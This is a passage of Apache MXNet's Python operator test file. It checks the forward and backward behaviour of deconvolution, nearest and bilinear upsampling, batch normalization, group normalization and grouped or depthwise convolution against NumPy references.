exe.forward(is_train=True)
out = exe.outputs[0]
exe.backward(out_grad)
assert_almost_equal(out, args_grad[0], rtol=1E-3, atol=1e-3)
args_grad_addto_npy = [np.random.normal(size=s) for s in arg_shapes]
args_grad_addto = [mx.nd.array(ele) for ele in args_grad_addto_npy]
exe = deconv._bind(default_context(), args=args, args_grad=args_grad_addto, grad_req="add")
exe.forward(is_train=True)
out = exe.outputs[0].asnumpy()
exe.backward(out_grad)
assert_almost_equal(out + args_grad_addto_npy[0], args_grad_addto[0].asnumpy(), rtol=1e-3, atol=1e-3)
def check_deconvolution_gradient(input_shape, num_filter, pad):
"""configure A: input --> conv --> output.
configure B: input --> deconv --> output
the convolution and deconvoluiton has similar parameter which ensure
the input shape is the same as output;
During backward(), if the input of A equals output of B, and the output
of A equals input of B, then the grad of weight should be the same;
"""
ndim = len(pad)
stride = (1,) * ndim
kernel = tuple(2 * np.array(pad) + 1)
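# With stride 1, a kernel of size 2*pad + 1 keeps the spatial output shape
# equal to the input shape ("same" convolution), as the docstring requires.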
data_conv = mx.sym.Variable(name="data_conv")
conv = mx.sym.Convolution(
data=data_conv, kernel=kernel, stride=stride, pad=pad,
num_filter=num_filter, no_bias = "true", name = "conv")
data_deconv = mx.sym.Variable(name="data_deconv")
deconv = mx.sym.Deconvolution(
data=data_deconv, kernel=kernel, stride=stride, pad=pad,
num_filter=num_filter, no_bias = "true", name = "deconv")
conv_data = mx.random.uniform(-5, 5, input_shape, ctx=mx.cpu()).copyto(default_context())
conv_args = {}
conv_args["data_conv"] = conv_data
conv_args['conv_weight'] = \
mx.random.normal(0, 1,(num_filter, input_shape[1]) + kernel, ctx=mx.cpu()).copyto(default_context())
conv_args_grad = [mx.nd.zeros(conv_data.shape),
mx.nd.zeros((num_filter, input_shape[1]) + kernel)]
exe_conv = conv._bind(default_context(), args=conv_args, args_grad=conv_args_grad)
exe_conv.forward(is_train=True)
conv_out_grad = mx.random.normal(0, 2, exe_conv.outputs[0].shape, ctx=mx.cpu()).copyto(default_context())
exe_conv.backward(conv_out_grad)
deconv_data = conv_out_grad
deconv_args = {}
deconv_args['data_deconv'] = deconv_data
deconv_args['deconv_weight'] = conv_args['conv_weight']
deconv_args_grad = [mx.nd.zeros(deconv_data.shape),
mx.nd.zeros((num_filter, input_shape[1]) + kernel)]
deconv_addto_args_grad_npy = [np.random.normal(size=deconv_data.shape),
np.random.normal(size=(num_filter, input_shape[1]) + kernel)]
deconv_addto_args_grad = [mx.nd.array(deconv_addto_args_grad_npy[0]),
mx.nd.array(deconv_addto_args_grad_npy[1])]
exe_deconv = deconv._bind(default_context(), args=deconv_args, args_grad=deconv_args_grad)
exe_deconv.forward(is_train=True)
deconv_out_grad = conv_data[:]
exe_deconv.backward(deconv_out_grad)
assert_almost_equal(conv_args_grad[1], deconv_args_grad[1], rtol=1e-3, atol=1e-2)
# Test AddTo
exe_deconv_addto = deconv._bind(default_context(), args=deconv_args,
args_grad=deconv_addto_args_grad,
grad_req="add")
exe_deconv_addto.forward(is_train=True)
deconv_out_grad = conv_data[:]
exe_deconv_addto.backward(deconv_out_grad)
assert_almost_equal(conv_args_grad[1].asnumpy() + deconv_addto_args_grad_npy[1],
deconv_addto_args_grad[1].asnumpy(), rtol=1e-3, atol=1e-2)
def check_deconvolution_target_shape(input_shape, kernel, stride, pad, adj, target_shape=None):
data = mx.sym.Variable(name="data")
if target_shape:
deconv = mx.sym.Deconvolution(
data=data, kernel=kernel, stride=stride, pad=pad, adj=adj, num_filter=5,
target_shape = target_shape)
else:
deconv = mx.sym.Deconvolution(
data=data, kernel=kernel, stride=stride, pad=pad, adj=adj, num_filter=5)
arg_names = deconv.list_arguments()
arg_shapes, out_shapes, _ = deconv.infer_shape(data=input_shape)
default_target_size = 8
if target_shape is None:
target_shape = (default_target_size,) * len(kernel)
assert out_shapes[0] == (input_shape[0], 5) + target_shape
@pytest.mark.serial
def test_deconvolution():
# 2D
check_deconvolution_target_shape(
input_shape = (2,3,4,4),
kernel = (3,3),
stride = (2,2),
target_shape = (8,8),
pad = (99,99), # will be ignored
adj = (101,101), # will be ignored
)
check_deconvolution_target_shape(
input_shape = (2,3,4,4),
kernel = (3,3),
stride = (2,2),
pad = (1,1),
adj = (1,1),
)
check_deconvolution_forward_backward(
input_shape = (1,1,5,5),
num_filter = 1,
kernel = (3,3),
stride = (1,1),
pad = (1,1)
)
check_deconvolution_forward_backward(
input_shape = (32,3,28,28),
num_filter = 3,
kernel = (3,3),
stride = (1,1),
pad = (1,1)
)
check_deconvolution_forward_backward(
input_shape = (10, 3, 403, 403),
num_filter = 3,
kernel = (7,7),
stride = (5,5),
pad = (2,2)
)
check_deconvolution_gradient(
input_shape = (1,3,5,5),
num_filter = 3,
pad = (1,1)
)
check_deconvolution_gradient(
input_shape = (5,3,100,100),
num_filter = 3,
pad = (3,3)
)
# 1D
check_deconvolution_target_shape(
input_shape = (2,3,4),
kernel = (3,),
stride = (2,),
target_shape = (8,),
pad = (99,), # will be ignored
adj = (101,), # will be ignored
)
check_deconvolution_target_shape(
input_shape = (2,3,4),
kernel = (3,),
stride = (2,),
pad = (1,),
adj = (1,),
)
check_deconvolution_forward_backward(
input_shape = (1,1,5),
num_filter = 1,
kernel = (3,),
stride = (1,),
pad = (1,)
)
check_deconvolution_forward_backward(
input_shape = (32,3,28),
num_filter = 3,
kernel = (3,),
stride = (1,),
pad = (1,)
)
check_deconvolution_forward_backward(
input_shape = (10, 3, 403),
num_filter = 3,
kernel = (7,),
stride = (5,),
pad = (2,)
)
check_deconvolution_gradient(
input_shape = (1,3,5),
num_filter = 3,
pad = (1,)
)
check_deconvolution_gradient(
input_shape = (5,3,100),
num_filter = 3,
pad = (3,)
)
def test_deconvolution_forward_with_bias():
"""Check if deconvolution forward can work well with bias=True
"""
def check_deconvolution_forward_with_bias(shape=(1, 16, 5, 5), num_filter=32, num_group=1, kernel=(3, 3), pad=(1, 1)):
x = mx.sym.Variable('x')
w = mx.sym.Variable('w')
input_data = mx.random.uniform(-5, 5, shape, ctx=mx.cpu())
y = mx.sym.Deconvolution(data=x, weight=w, num_filter=num_filter, num_group=num_group, kernel=kernel, no_bias=False, pad=pad)
exe = y._simple_bind(ctx=mx.cpu(), x=shape, grad_req='null')
exe.arg_arrays[0][:] = np.random.normal(size=exe.arg_arrays[0].shape)
exe.arg_arrays[1][:] = np.random.normal(size=exe.arg_arrays[1].shape)
exe.forward(is_train=False)
o = exe.outputs[0]
t = o.asnumpy()
check_deconvolution_forward_with_bias((1, 16, 5), 32, 1, (3,), (1,))
check_deconvolution_forward_with_bias((32, 16, 5), 32, 1, (3,), (1,))
check_deconvolution_forward_with_bias((1, 16, 5, 5), 32, 1, (3, 3), (1, 1))
check_deconvolution_forward_with_bias((32, 16, 5, 5), 32, 1, (3, 3), (1, 1))
def check_nearest_upsampling_with_shape(shapes, scale, root_scale):
arr = {'arg_%d'%i: mx.random.uniform(-10.0, 10.0, shape, ctx=mx.cpu()).copyto(default_context()) for i, shape in zip(range(len(shapes)), shapes)}
arr_grad = {'arg_%d'%i: mx.nd.zeros(shape) for i, shape in zip(range(len(shapes)), shapes)}
up = mx.sym.UpSampling(*[mx.sym.Variable('arg_%d'%i) for i in range(len(shapes))], sample_type='nearest', scale=root_scale)
exe = up._bind(default_context(), args=arr, args_grad=arr_grad)
exe.forward(is_train=True)
exe.backward(exe.outputs)
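# The k-th input is upsampled by a factor of root_scale * scale**k per spatial
# dimension. Nearest-neighbour backward sums each upsampled block, so using the
# forward output as the output gradient scales each input gradient by the square
# of its total upsampling factor, which the check below relies on.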
for k in range(len(shapes)):
name = 'arg_%d'%k
assert_allclose(arr[name].asnumpy()*root_scale**2*scale**(2*k), arr_grad[name].asnumpy(), rtol=1e-4)
def check_bilinear_upsampling_with_shape(data_shape, weight_shape, scale, root_scale, num_filter):
def _init_bilinear(arr, f):
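# Fill `arr` with the standard separable bilinear interpolation kernel of
# factor f: weight(x, y) = (1 - |x/f - c|) * (1 - |y/f - c|), where c centres
# the kernel (the initialisation commonly used for FCN-style upsampling).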
weight = np.zeros(np.prod(arr.shape), dtype='float32')
shape = arr.shape
c = (2 * f - 1 - f % 2) / (2. * f)
for i in range(np.prod(shape)):
x = i % shape[3]
y = (i // shape[3]) % shape[2]
weight[i] = (1 - abs(x / f - c)) * (1 - abs(y / f - c))
arr[:] = weight.reshape(shape)
return arr
up = mx.sym.UpSampling(mx.sym.Variable("data"),
mx.sym.Variable('weight'), sample_type='bilinear', scale=root_scale,
num_filter=num_filter, num_args=2)
arg_shapes, out_shapes, _ = up.infer_shape(data=data_shape)
arr = {'data': mx.random.uniform(-5, 5, data_shape, ctx=mx.cpu()).copyto(default_context()),
'weight': mx.nd.array(_init_bilinear(mx.ndarray.empty(arg_shapes[1]).asnumpy(), root_scale))}
arr_grad = [mx.nd.empty(s) for s in arg_shapes]
exe = up._bind(default_context(), args=arr, args_grad=arr_grad)
exe.forward(is_train=True)
out = exe.outputs[0].asnumpy()
exe.backward(exe.outputs)
target_shape = (data_shape[2] * root_scale, data_shape[3] * root_scale)
assert out.shape == data_shape[:2] + target_shape
def test_nearest_upsampling():
for root_scale in [1,2,3]:
for scale in [1,2,3]:
for num_shape in [1,2,3]:
for base in [1,2,3]:
shapes = [(1,3,base*root_scale*scale**(num_shape-1-i),base*root_scale*scale**(num_shape-1-i)) for i in range(num_shape)]
check_nearest_upsampling_with_shape(shapes, scale, root_scale)
def test_bilinear_upsampling():
rootscale = [2,3]
scales = [1,2,3]
filters = [1,2,3]
bases = [1,2,3]
for params in itertools.product(rootscale, scales, filters, bases):
root_scale, scale, num_filter, base = params
# Bilinear upsampling takes exactly one data input and one weight input;
# the multi-input mode used for nearest upsampling is not applicable here.
dimension = base*root_scale*scale
kernel = 2 * root_scale - root_scale % 2
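# For bilinear upsampling by a factor f, the usual kernel size is 2*f - f % 2
# (even factors use an even kernel, odd factors an odd one).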
data_shape = (1, num_filter, dimension, dimension)
weight_shape = (1, num_filter, kernel, kernel)
check_bilinear_upsampling_with_shape(data_shape, weight_shape, scale, root_scale, num_filter)
def test_batchnorm_training():
def check_batchnorm_training(stype):
for shape in [(2, 3), (2, 3, 2, 2), (2, 8, 2, 2)]:
data_tmp = np.random.normal(-0.1, 0.1, size=shape)
s = (shape[1],)
gamma = np.ones(s)
beta = np.ones(s)
gamma[1] = 3
beta[0] = 3
rolling_mean = np.random.uniform(size=s)
rolling_std = np.random.uniform(size=s)
data = mx.symbol.Variable('data', stype=stype)
in_location = [mx.nd.array(data_tmp).tostype(stype), mx.nd.array(gamma).tostype(stype),
mx.nd.array(beta).tostype(stype)]
mean_std = [mx.nd.array(rolling_mean).tostype(stype), mx.nd.array(rolling_std).tostype(stype)]
test = mx.symbol.BatchNorm(data, fix_gamma=True)
check_numeric_gradient(test, in_location, mean_std, numeric_eps=1e-2, rtol=0.16, atol=1e-2)
test = mx.symbol.BatchNorm(data, fix_gamma=True, use_global_stats=True)
check_numeric_gradient(test, in_location, mean_std, numeric_eps=1e-2, rtol=0.16, atol=1e-2)
test = mx.symbol.BatchNorm(data, fix_gamma=False)
check_numeric_gradient(test, in_location, mean_std, numeric_eps=1e-2, rtol=0.16, atol=1e-2)
test = mx.symbol.BatchNorm(data, fix_gamma=False, use_global_stats=True)
check_numeric_gradient(test, in_location, mean_std, numeric_eps=1e-2, rtol=0.16, atol=1e-2)
# Test varying channel axis
dim = len(shape)
for chaxis in range(-dim, dim):
chaxis_true = chaxis
if chaxis < 0:
chaxis_true = dim + chaxis
shapex = shape
channel_count = shapex[chaxis_true]
data_tmp = np.random.normal(-0.1, 0.1, size=shapex)
gamma = np.ones(channel_count)
beta = np.ones(channel_count)
if channel_count > 1:
gamma[1] = 3
beta[0] = 3
in_location = [mx.nd.array(data_tmp).tostype(stype), mx.nd.array(gamma).tostype(stype),
mx.nd.array(beta).tostype(stype)]
xrolling_mean = np.random.uniform(size=channel_count)
xrolling_std = np.random.uniform(size=channel_count)
xmean_std = [mx.nd.array(xrolling_mean).tostype(stype),
mx.nd.array(xrolling_std).tostype(stype)]
test = mx.symbol.BatchNorm(data, fix_gamma=True, axis=chaxis)
check_numeric_gradient(test, in_location, xmean_std, numeric_eps=1e-2, rtol=0.2, atol=0.01)
test = mx.symbol.BatchNorm(data, fix_gamma=True, use_global_stats=True, axis=chaxis)
check_numeric_gradient(test, in_location, xmean_std, numeric_eps=1e-2, rtol=0.2, atol=0.01)
test = mx.symbol.BatchNorm(data, fix_gamma=False, axis=chaxis)
check_numeric_gradient(test, in_location, xmean_std, numeric_eps=1e-2, rtol=0.2, atol=0.01)
test = mx.symbol.BatchNorm(data, fix_gamma=False, use_global_stats=True, axis=chaxis)
check_numeric_gradient(test, in_location, xmean_std, numeric_eps=1e-2, rtol=0.2, atol=0.01)
check_batchnorm_training('default')
@xfail_when_nonstandard_decimal_separator
@pytest.mark.parametrize('op_name', ['BatchNorm', 'SyncBatchNorm'])
@pytest.mark.parametrize('shape', [(4, 2), (4, 3, 4),
(4, 6, 4, 5), (4, 5, 6, 4, 5)])
@pytest.mark.parametrize('fix_gamma', [False, True])
@pytest.mark.parametrize('cudnn_off', [False, True])
@pytest.mark.parametrize('output_mean_var', [False, True])
def test_batchnorm(op_name, shape, fix_gamma, cudnn_off, output_mean_var):
if op_name == 'BatchNorm':
op = mx.nd.BatchNorm
elif op_name == 'SyncBatchNorm':
op = mx.nd.contrib.SyncBatchNorm
else:
raise ValueError(f'Not supported {op_name}')
momentum = 0.9
epsilon = 1e-5
def _test_batchnorm_impl(axis,
data_grad_req, gamma_grad_req, beta_grad_req):
kwargs = dict(output_mean_var=output_mean_var)
if op_name == 'SyncBatchNorm':
if axis != 1:
return
key = str(op) + str(shape) + str(axis)
kwargs.update(dict(key=key))
if cudnn_off:
return
else:
kwargs.update(dict(axis=axis, cudnn_off=cudnn_off))
nch = shape[axis]
if not fix_gamma:
bn_gamma = mx.nd.random.uniform(shape=(nch,))
bn_gamma.attach_grad(grad_req=gamma_grad_req)
else:
bn_gamma = mx.nd.ones(shape=(nch,))
bn_beta = mx.nd.random.uniform(shape=(nch,))
bn_beta.attach_grad(grad_req=beta_grad_req)
bn_running_mean = mx.nd.zeros(nch)
bn_running_var = mx.nd.ones(nch)
running_mean = mx.nd.zeros(nch)
running_var = mx.nd.ones(nch)
num_iters = 10
expand_shape = [1] * len(shape)
expand_shape[axis] = shape[axis]
data = mx.nd.random.uniform(shape=shape)
data.attach_grad(grad_req=data_grad_req)
adX, adW, adb = 0, 0, 0
is_train = data_grad_req != 'null' or \
(not fix_gamma and gamma_grad_req != 'null') or \
beta_grad_req != 'null'
for _ in range(num_iters):
if data_grad_req != 'add':
data = mx.nd.random.uniform(shape=shape)
data.attach_grad(grad_req=data_grad_req)
ograd = mx.nd.random.uniform(shape=shape)
with mx.autograd.record():
output = op(data, bn_gamma, bn_beta,
bn_running_mean, bn_running_var,
momentum=momentum, eps=epsilon,
fix_gamma=fix_gamma, **kwargs)
if output_mean_var:
output, output_mean, output_std = output
if is_train:
output.backward(ograd)
mx.nd.waitall()
data_mean = data.mean(
axis=axis, exclude=True, keepdims=True)
data_var = (data - data_mean).square().mean(axis=axis,
exclude=True,
keepdims=True)
target_output = (data - data_mean) / \
(data_var + epsilon).sqrt() * \
bn_gamma.reshape(expand_shape) + \
bn_beta.reshape(expand_shape)
# squeeze data_mean and data_var
data_mean_flat = data_mean.squeeze()
data_var_flat = data_var.squeeze()
running_mean = running_mean * momentum + \
data_mean_flat * (1 - momentum)
m = np.prod(shape) / shape[axis]
# cudnn uses m-1 in the denominator of its sample variance calculation, not m
sample_var_adjust = 1.0 if cudnn_off or fix_gamma else m / (m-1)
running_var = running_var * momentum + \
data_var_flat * sample_var_adjust * (1 - momentum)
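# Reference gradients below follow the standard batch-norm backward
# derivation; dX, dW, db are accumulated across iterations (adX, adW, adb)
# when the corresponding grad_req is 'add'.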
W = bn_gamma.reshape(expand_shape)
dnx = ograd * W
xsm = data - data_mean
nd = 1.0 / mx.nd.sqrt(data_var + epsilon)
nx = xsm * nd
dvar = (dnx * xsm).sum(axis=axis, keepdims=True,
exclude=True) * (-0.5) * mx.nd.power(nd, 3)
dmean = -nd * dnx.sum(axis=axis, keepdims=True, exclude=True) - \
dvar * xsm.mean(axis=axis, keepdims=True,
exclude=True) * 2.0
dX = dnx * nd + dvar * xsm * (2.0 / m) + dmean * (1.0 / m)
dW = (ograd * nx).sum(axis=axis, exclude=True)
db = ograd.sum(axis=axis, exclude=True)
adX = dX if data_grad_req != 'add' else adX + dX
adW = dW if gamma_grad_req != 'add' else adW + dW
adb = db if beta_grad_req != 'add' else adb + db
atol, rtol = 5e-2, 5e-2
if output_mean_var:
assert_almost_equal(output_mean.asnumpy(),
data_mean_flat.asnumpy(),
atol=atol, rtol=rtol)
if op != mx.nd.contrib.SyncBatchNorm:
assert_almost_equal(output_std.asnumpy(),
(1.0 / (data_var_flat +
epsilon).sqrt()).asnumpy(),
atol=atol, rtol=rtol)
else:
assert_almost_equal(output_std.asnumpy(),
data_var_flat.asnumpy(),
atol=atol, rtol=rtol)
assert_almost_equal(output.asnumpy(), target_output.asnumpy(),
atol=atol, rtol=rtol)
if is_train:
assert_almost_equal(bn_running_mean.asnumpy(
), running_mean.asnumpy(), atol=atol, rtol=rtol)
assert_almost_equal(bn_running_var.asnumpy(
), running_var.asnumpy(), atol=atol, rtol=rtol)
if data_grad_req != 'null':
assert_almost_equal(data.grad.asnumpy(),
adX.asnumpy(), atol=atol, rtol=rtol)
if not fix_gamma:
if gamma_grad_req != 'null':
assert_almost_equal(
bn_gamma.grad.asnumpy(), adW.asnumpy(),
atol=atol, rtol=rtol)
else:
assert((bn_gamma.asnumpy() == 1).all())
if beta_grad_req != 'null':
assert_almost_equal(
bn_beta.grad.asnumpy(), adb.asnumpy(), atol=atol, rtol=rtol)
grad_reqs = ['write'] if len(shape) != 4 else ['null', 'write', 'add']
for data_grad_req in grad_reqs:
for gamma_grad_req in grad_reqs:
if fix_gamma and gamma_grad_req != 'null':
continue
for beta_grad_req in grad_reqs:
for axis in range(len(shape)):
_test_batchnorm_impl(axis,
data_grad_req, gamma_grad_req, beta_grad_req)
def test_groupnorm():
acc_types = {'float16': 'float32', 'float32': 'float64', 'float64': 'float64'}
def x_hat_helper(x, num_groups, eps):
dtype = x.dtype
dshape = x.shape
assert len(dshape) == 4
acc_type = acc_types[str(dtype)]
new_shape = (dshape[0], num_groups, int(dshape[1] / num_groups), dshape[2], dshape[3])
new_moments_shape = (dshape[0], num_groups, 1, 1, 1)
data = x.reshape(new_shape)
mean = np.mean(data, axis=(2, 3, 4), keepdims=False, dtype=acc_type).astype(dtype)
std = np.sqrt(np.var(data, axis=(2, 3, 4), dtype=acc_type, keepdims=False).astype(dtype) + eps)
x_hat = (data - mean.reshape(new_moments_shape)) / std.reshape(new_moments_shape)
return x_hat, mean, std
def np_groupnorm(data, gamma, beta, num_groups, eps):
new_param_shape = (1, dshape[1], 1, 1)
x_hat, mean, std = x_hat_helper(data, num_groups, eps)
out = x_hat.reshape(dshape) * gamma.reshape(new_param_shape) + beta.reshape(new_param_shape)
return out, mean, std
def np_groupnorm_grad(ograd, data, gamma, beta, mean, std, num_groups, eps):
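# NumPy reference backward pass for GroupNorm: the beta/gamma gradients are
# plain reductions of the output gradient (gamma additionally scaled by x_hat),
# and the data gradient subtracts the per-group means of the normalized
# gradient terms.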
x_hat, mean, std = x_hat_helper(data, num_groups, eps)
new_shape = x_hat.shape
dshape = data.shape
dtype = data.dtype
new_moments_shape = (new_shape[0], num_groups, 1, 1, 1)
new_param_shape = (1, dshape[1], 1, 1)
acc_type = acc_types[str(dtype)]
ograd = ograd.reshape(new_shape)
data = data.reshape(new_shape)
gamma = gamma.reshape(new_param_shape)
beta = beta.reshape(new_param_shape)
mean = mean.reshape(new_moments_shape)
std = std.reshape(new_moments_shape)
beta_grad = np.sum(ograd, axis=(0, 3, 4), dtype=acc_type, keepdims=False).astype(dtype).flatten()
gamma_grad = np.sum(x_hat * ograd, axis=(0, 3, 4), dtype=acc_type, keepdims=False).astype(dtype).flatten()
x_hat_grad = ograd * gamma.reshape(1, num_groups, dshape[1] // num_groups, 1, 1)
ograd_mult = x_hat_grad / std
red_out = np.mean(ograd_mult, axis=(2, 3, 4), dtype=acc_type, keepdims=True).astype(dtype)
data_grad = ograd_mult - red_out
red_out = np.mean(ograd_mult * x_hat, axis=(2, 3, 4), dtype=acc_type, keepdims=True).astype(dtype)
data_grad = data_grad - x_hat * red_out
return data_grad.reshape(dshape), gamma_grad, beta_grad
batch_size = random.randint(1, 8)
num_groups = random.randint(2, 3)
num_channels = random.randint(2, 3) * num_groups
height = random.randint(1, 5)
width = random.randint(1, 5)
dshape = (batch_size, num_channels, height, width)
param_shape = (num_channels,)
temp_shape = (batch_size, num_groups, int(num_channels / num_groups), height, width)
np_data = np.random.uniform(0.2, 1.0, dshape)
np_gamma = np.random.uniform(-1.0, 1.0, param_shape)
np_beta = np.random.uniform(-1.0, 1.0, param_shape)
data_sym = mx.sym.Variable("data")
gamma_sym = mx.sym.Variable("gamma")
beta_sym = mx.sym.Variable("beta")
for dtype in [np.float16, np.float32, np.float64]:
eps = 1e-2 if dtype == np.float16 else 1e-5
mx_data = mx.nd.array(np_data, dtype=dtype)
mx_gamma = mx.nd.array(np_gamma, dtype=dtype)
mx_beta = mx.nd.array(np_beta, dtype=dtype)
np_out, np_mean, np_std = np_groupnorm(np_data.astype(dtype),
np_gamma.astype(dtype),
np_beta.astype(dtype),
num_groups=num_groups,
eps=eps)
mx_sym = mx.sym.GroupNorm(data=data_sym, gamma=gamma_sym, beta=beta_sym,
num_groups=num_groups, eps=eps, output_mean_var=True)
check_symbolic_forward(mx_sym, [mx_data, mx_gamma, mx_beta], [np_out, np_mean, np_std],
rtol=1e-2 if dtype == np.float16 else 1e-3,
atol=5e-3 if dtype == np.float16 else 1e-4, dtype=dtype)
mx_sym = mx.sym.GroupNorm(data=data_sym, gamma=gamma_sym, beta=beta_sym,
num_groups=num_groups, eps=eps, output_mean_var=False)
np_ograd = np.random.uniform(-1.0, 1.0, dshape).astype(dtype)
np_data_grad, np_gamma_grad, np_beta_grad = np_groupnorm_grad(np_ograd,
np_data.astype(dtype),
np_gamma.astype(dtype),
np_beta.astype(dtype),
np_mean, np_std,
num_groups, eps)
check_symbolic_backward(mx_sym, [mx_data, mx_gamma, mx_beta], [mx.nd.array(np_ograd, dtype=np_ograd.dtype)],
[np_data_grad, np_gamma_grad, np_beta_grad],
rtol=1e-2 if dtype == np.float16 else 1e-3,
atol=5e-2 if dtype == np.float16 else 1e-4, dtype=dtype)
def test_convolution_grouping():
for dim in [1, 2, 3]:
num_filter = 4
for num_group in [1, 2]:
kernel = (3,) * dim
shape = (1, 4) + (9,) * dim
x = mx.sym.Variable('x')
w = mx.sym.Variable('w')
b = mx.sym.Variable('b')
y1 = mx.sym.Convolution(data=x, weight=w, bias=b, num_filter=num_filter, num_group=num_group, kernel=kernel)
xslice = mx.sym.SliceChannel(data=x, num_outputs=num_group, axis=1)
wslice = mx.sym.SliceChannel(data=w, num_outputs=num_group, axis=0)
bslice = mx.sym.SliceChannel(data=b, num_outputs=num_group, axis=0)
y2 = mx.sym.Concat(*[mx.sym.Convolution(data=xslice[i], weight=wslice[i], bias=bslice[i],
num_filter=num_filter//num_group, kernel=kernel)
for i in range(num_group)])
exe1 = y1._simple_bind(default_context(), x=shape)
exe2 = y2._simple_bind(default_context(), x=shape, w=(num_filter, shape[1]//num_group) + kernel, b=(num_filter,))
for arr1, arr2 in zip(exe1.arg_arrays, exe2.arg_arrays):
arr1[:] = np.float32(np.random.normal(size=arr1.shape))
arr2[:] = arr1
exe1.forward(is_train=True)
exe1.backward(exe1.outputs[0])
exe2.forward(is_train=True)
exe2.backward(exe2.outputs[0])
for arr1, arr2 in zip(exe1.outputs + exe1.grad_arrays, exe2.outputs + exe2.grad_arrays):
np.testing.assert_allclose(arr1.asnumpy(), arr2.asnumpy(), rtol=1e-3, atol=1e-3)
@pytest.mark.skip(reason="Flaky test https://github.com/apache/incubator-mxnet/issues/14052")
def test_depthwise_convolution():
for dim in [1,2]:
for num_base in [1, 4, 16, 32, 64]:
for kernel_x in [3, 5]:
for stride_x in [1, 2]:
for pad_x in [0, 1]:
for in_size in [7, 32]:
kernel = (kernel_x,) * dim
stride = (stride_x,) * dim
pad = (pad_x,) * dim
num_filter = num_base
num_group = num_base
shape = (2, num_base) + (in_size,) * dim
x = mx.sym.Variable('x')
w = mx.sym.Variable('w')
b = mx.sym.Variable('b')
y1 = mx.sym.Convolution(data=x, weight=w, bias=b, num_filter=num_filter, num_group=num_group,
kernel=kernel, stride=stride, pad=pad)
xslice = mx.sym.SliceChannel(data=x, num_outputs=num_group, axis=1)
wslice = mx.sym.SliceChannel(data=w, num_outputs=num_group, axis=0)
bslice = mx.sym.SliceChannel(data=b, num_outputs=num_group, axis=0)
y2 = mx.sym.Concat(*[mx.sym.Convolution(data=xslice[i], weight=wslice[i], bias=bslice[i],
num_filter=num_filter//num_group, kernel=kernel,
stride=stride, pad=pad)
for i in range(num_group)])
dev = default_context()
exe1 = y1._simple_bind(dev, x=shape)
exe2 = y2._simple_bind(dev, x=shape, w=(num_filter, shape[1]//num_group)+kernel,
b=(num_filter,))
for arr1, arr2 in zip(exe1.arg_arrays, exe2.arg_arrays):
arr1[:] = np.random.normal(size=arr1.shape)
arr2[:] = arr1
exe1.forward(is_train=True)
exe1.backward(exe1.outputs[0])
exe2.forward(is_train=True)
exe2.backward(exe2.outputs[0])
for arr1, arr2 in zip(exe1.outputs + exe1.grad_arrays, exe2.outputs + exe2.grad_arrays):
assert_allclose(arr1, arr2, rtol=1e-3, atol=1e-3)
def test_convolution_independent_gradients():
# NOTE(zixuanweeei): Flaky test tracked by https://github.com/apache/incubator-mxnet/issues/15603.
# GPU context will be enabled after figuring out the possible issue tracked at
# https://github.com/apache/incubator-mxnet/issues/15638.
ctx = mx.cpu()
atol = 1.0e-3
rtol = 1.0e-3
reqs = ["null", "write", "add"]
var_names = ["x", "w", "b"]
dims = [1, 2]
num_bases = [1, 8]
kernel_xs = [3, 5]
stride_xs = [1, 2]
pad_xs = [0, 1]
in_sizes = [7, 32]
no_biases = [True, False]
for dim, num_base, kernel_x, stride_x, pad_x , in_size, no_bias in \
itertools.product(dims, num_bases, kernel_xs, stride_xs, pad_xs, in_sizes, no_biases):
# Prepare params shape
kernel = (kernel_x,) * dim
stride = (stride_x,) * dim
pad = (pad_x,) * dim
num_filter = num_base
x_shape = (2, num_base) + (in_size,) * dim
w_shape = (num_filter, num_base) + kernel
# Symbols definition
x = mx.sym.Variable('x')
w = mx.sym.Variable('w')
b = mx.sym.Variable('b') if not no_bias else None
conv = mx.sym.Convolution(x, w, b, num_filter=num_filter,
kernel=kernel, stride=stride, pad=pad, no_bias=no_bias)
for req_kind in reqs:
# Binding args for conv with possible dependent gradients
base_args = {
'x': mx.nd.random.normal(shape=x_shape, ctx=ctx),
'w': mx.nd.random.normal(shape=w_shape, ctx=ctx),
'b': mx.nd.random.normal(shape=(num_filter, ), ctx=ctx) if not no_bias else None}
args1 = copy.deepcopy(base_args)
grad1 = {
'x': mx.nd.zeros(shape=x_shape, ctx=ctx),
'w': mx.nd.zeros(shape=w_shape, ctx=ctx),
'b': mx.nd.zeros(shape=(num_filter, ), ctx=ctx) if not no_bias else None}
grad_req1 = [req_kind] * 3
grad_req1 = dict(zip(var_names, grad_req1))
exe1 = conv._bind(ctx, args1, args_grad=grad1, grad_req=grad_req1)
exe1.forward(is_train=True)
exe1.backward(exe1.outputs[0])
for x_req, w_req, b_req in itertools.product(reqs, repeat=3):
# Binding args for conv with independent gradients
args2 = copy.deepcopy(base_args) # Deepcopy the same params of `exe1`
grad2 = {
'x': mx.nd.zeros(shape=x_shape, ctx=ctx),
'w': mx.nd.zeros(shape=w_shape, ctx=ctx),
'b': mx.nd.zeros(shape=(num_filter, ), ctx=ctx) if not no_bias else None}
grad_req2 = {"x": x_req, "w": w_req, "b": b_req}
exe2 = conv._bind(ctx, args2, args_grad=grad2, grad_req=grad_req2)
exe2.forward(is_train=True)
np.testing.assert_allclose(exe1.outputs[0].asnumpy(),
exe2.outputs[0].asnumpy(), rtol=rtol, atol=atol)
exe2.backward(exe2.outputs[0])
for var_name in var_names:
if var_name == "b" and no_bias:
continue
if grad_req2[var_name] == "null":
exe2_var_grad = grad2[var_name].asnumpy()
np.testing.assert_allclose(exe2_var_grad,
np.zeros_like(exe2_var_grad), rtol=rtol, atol=atol)
if grad_req2[var_name] != grad_req1[var_name]:
continue
np.testing.assert_allclose(args1[var_name].asnumpy(),
args2[var_name].asnumpy(), rtol=rtol, atol=atol)
np.testing.assert_allclose(grad1[var_name].asnumpy(),
grad2[var_name].asnumpy(), rtol=rtol, atol=atol)
def gen_broadcast_data(idx):
# Manually set test cases
binary_op_data_shape = np.array(
[[[2, 5, 1, 30, 7], [1, 5, 448, 30, 1]],
[[10, 49, 1, 77, 17], [10, 1, 2, 1, 17]],
[[13, 2, 65, 2, 1], [13, 1, 65, 1, 225]],
[[9, 434, 4, 2, 37], [9, 1, 4, 1, 37]],
[[2, 52, 1, 4, 1], [1, 52, 60, 1, 37]],
[[1, 23, 7, 122, 50], [2, 1, 7, 1, 50]],
[[1, 17, 1, 5, 1], [22, 1, 2, 1, 28]],
[[29, 1, 2, 1, 8], [29, 22, 1, 130, 1]],
[[2, 36, 1, 427, 3], [1, 36, 11, 427, 1]],
[[1, 2, 1, 100, 7], [1, 2, 448, 100, 1]],
[[1, 2, 495, 77, 7], [1, 2, 1, 1, 7]],
